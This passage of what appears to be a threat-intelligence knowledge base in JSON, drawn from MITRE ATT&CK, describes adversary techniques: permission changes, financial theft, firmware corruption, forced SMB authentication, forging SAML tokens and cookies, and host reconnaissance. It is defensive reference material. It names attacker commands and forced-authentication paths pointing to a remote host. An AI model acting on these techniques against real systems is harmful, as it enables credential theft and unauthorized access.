"description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platforms permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1222.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "5c6687f6-3539-4268-a6a4-2b98fdeac0fb",
"value": "Linux and Mac File and Directory Permissions Modification"
},
{
"description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).<sup>[[Microsoft DACL May 2018](https://app.tidalcyber.com/references/32a250ca-a7eb-4d7f-af38-f3e6a09540e2)]</sup> Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.<sup>[[Microsoft Access Control Lists May 2018](https://app.tidalcyber.com/references/2aeda95a-7741-4a74-a5a4-29a9e7a89451)]</sup>\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1222.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9d36254c-e568-4c03-8688-e6eed5f7510c",
"value": "Windows File and Directory Permissions Modification"
},
{
"description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directorys existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.<sup>[[new_rust_based_ransomware](https://app.tidalcyber.com/references/8206240f-c84e-442e-b025-f629e9cc8d91)]</sup><sup>[[bad_luck_blackcat](https://app.tidalcyber.com/references/0d1e9635-b7b6-454b-9482-b1fc7d33bfff)]</sup><sup>[[falconoverwatch_blackcat_attack](https://app.tidalcyber.com/references/9d0ff77c-09e9-4d58-86f4-e2398f298ca9)]</sup><sup>[[blackmatter_blackcat](https://app.tidalcyber.com/references/605b58ea-9544-49b8-b3c8-0a97b2b155dc)]</sup><sup>[[fsutil_behavior](https://app.tidalcyber.com/references/07712696-b1fd-4704-b157-9e420840fb2c)]</sup> ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "5c6687f6-3539-4268-a6a4-2b98fdeac0fb",
"type": "similar"
},
{
"dest-uuid": "9d36254c-e568-4c03-8688-e6eed5f7510c",
"type": "similar"
}
],
"uuid": "cb2e4822-2529-4216-b5b8-75158c5f85ff",
"value": "File and Directory Permissions Modification"
},
{
"description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,<sup>[[FBI-ransomware](https://app.tidalcyber.com/references/54e296c9-edcc-5af7-99be-b118da29711f)]</sup> business email compromise (BEC) and fraud,<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> \"pig butchering,\"<sup>[[wired-pig butchering](https://app.tidalcyber.com/references/dc833e17-7105-5790-b30b-b4fed7fd2d2f)]</sup> bank hacking,<sup>[[DOJ-DPRK Heist](https://app.tidalcyber.com/references/c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac)]</sup> and exploiting cryptocurrency networks.<sup>[[BBC-Ronin](https://app.tidalcyber.com/references/8e162e39-a58f-5ba0-9a8e-101d4cfa324c)]</sup> \n\nAdversaries may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) to conduct unauthorized transfers of funds.<sup>[[Internet crime report 2022](https://app.tidalcyber.com/references/ef30c4eb-3da3-5c7b-a304-188acd2f7ebc)]</sup> In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) <sup>[[NYT-Colonial](https://app.tidalcyber.com/references/58900911-ab4b-5157-968c-67fa69cc122d)]</sup> and [Exfiltration](https://app.tidalcyber.com/tactics/66249a6d-be4e-43ab-a295-349d03a98023) of data, followed by threatening public exposure unless payment is made to the adversary.<sup>[[Mandiant-leaks](https://app.tidalcyber.com/references/aecc3ffb-c524-5ad9-b621-7228f53e27c3)]</sup>\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and business disruption.<sup>[[AP-NotPetya](https://app.tidalcyber.com/references/7f1af58a-33fd-538f-b092-789a8776780c)]</sup>",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9",
"value": "Financial Theft"
},
{
"description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.<sup>[[Symantec Chernobyl W95.CIH](https://app.tidalcyber.com/references/a35cab17-634d-4a7a-a42c-4a4280e8785d)]</sup> Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.<sup>[[dhs_threat_to_net_devices](https://app.tidalcyber.com/references/f1d16045-d365-43d2-bc08-65ba1ddbe0fd)]</sup><sup>[[cisa_malware_orgs_ukraine](https://app.tidalcyber.com/references/ebe89b36-f87f-4e09-8030-a1328c0b8683)]</sup> Depending on the device, this attack may also result in [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34). ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "559c647a-7759-4943-856d-dc717b5a443e",
"value": "Firmware Corruption"
},
{
"description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. <sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. <sup>[[Didier Stevens WebDAV Traffic](https://app.tidalcyber.com/references/b521efe2-5c1c-48c5-a2a9-95da2367f537)]</sup> <sup>[[Microsoft Managing WebDAV Security](https://app.tidalcyber.com/references/eeb7cd82-b116-4989-b3fa-968a23f839f3)]</sup>\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. <sup>[[GitHub Hashjacking](https://app.tidalcyber.com/references/d31f6612-c552-45e1-bf6b-889fe619ab5f)]</sup> With access to the credential hash, an adversary can perform off-line [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) cracking to gain access to plaintext credentials. <sup>[[Cylance Redirect to SMB](https://app.tidalcyber.com/references/32c7626a-b284-424c-8294-7fac37e71336)]</sup>\n\nThere are several different ways this can occur. <sup>[[Osanda Stealing NetNTLM Hashes](https://app.tidalcyber.com/references/991f885e-b3f4-4f3f-b0f9-c9862f918f36)]</sup> Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. <sup>[[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]</sup>\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\\\[remote address]\\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. <sup>[[US-CERT APT Energy Oct 2017](https://app.tidalcyber.com/references/e34ddf0a-a112-4557-ac09-1ff540241a89)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "e732e1d4-fffa-4fc3-b387-47782c821688",
"value": "Forced Authentication"
},
{
"description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.<sup>[[Microsoft SolarWinds Steps](https://app.tidalcyber.com/references/33e84eb1-4835-404b-8c1a-40695c04cdb4)]</sup> The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.<sup>[[Microsoft SAML Token Lifetimes](https://app.tidalcyber.com/references/8b810f7c-1f26-420b-9014-732f1469f145)]</sup> Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.<sup>[[Cyberark Golden SAML](https://app.tidalcyber.com/references/58083370-8126-47d3-827c-1910ed3f4b2a)]</sup>\n\nAn adversary may utilize [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> This differs from [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1606.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "dc0aecef-3cb2-4381-b6e4-dfa7be16d42b",
"value": "SAML Tokens"
},
{
"description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup> The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1606.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "b0966c0f-1e09-4d5d-acff-0ca79dc9da89",
"value": "Web Cookies"
},
{
"description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e), [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nThe generation of web credentials often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.<sup>[[GitHub AWS-ADFS-Credential-Generator](https://app.tidalcyber.com/references/340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8)]</sup> Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.<sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup><sup>[[Zimbra Preauth](https://app.tidalcyber.com/references/f8931e8d-9a03-5407-857a-2a1c5a895eed)]</sup>\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup><sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> ",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "dc0aecef-3cb2-4381-b6e4-dfa7be16d42b",
"type": "similar"
},
{
"dest-uuid": "b0966c0f-1e09-4d5d-acff-0ca79dc9da89",
"type": "similar"
}
],
"uuid": "d8507187-cea6-4be2-95b4-e875924e58c0",
"value": "Forge Web Credentials"
},
{
"description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1592.004"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "bc4f11b1-fd06-4e49-be48-e73ece82f1a9",
"value": "Client Configurations"
},
{
"description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).<sup>[[ArsTechnica Intel](https://app.tidalcyber.com/references/99151b50-3dd8-47b5-a48f-2e3b450944e9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1592.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "8af6a9ee-c323-44fa-85d3-29366fd1bb4f",
"value": "Firmware"
},
{
"description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://app.tidalcyber.com/technique/53fea37d-be26-4bed-a8a1-1d67f7cbffcf) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1592.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "a5ab5108-1582-4357-b948-1c6148c7b5ce",
"value": "Hardware"
},
{
"description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or for initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1592.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "77476b73-f4d1-4689-8f9e-af08d27f4cba",
"value": "Software"
},
{
"description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "bc4f11b1-fd06-4e49-be48-e73ece82f1a9",
"type": "similar"
},
{
"dest-uuid": "8af6a9ee-c323-44fa-85d3-29366fd1bb4f",
"type": "similar"
},
{
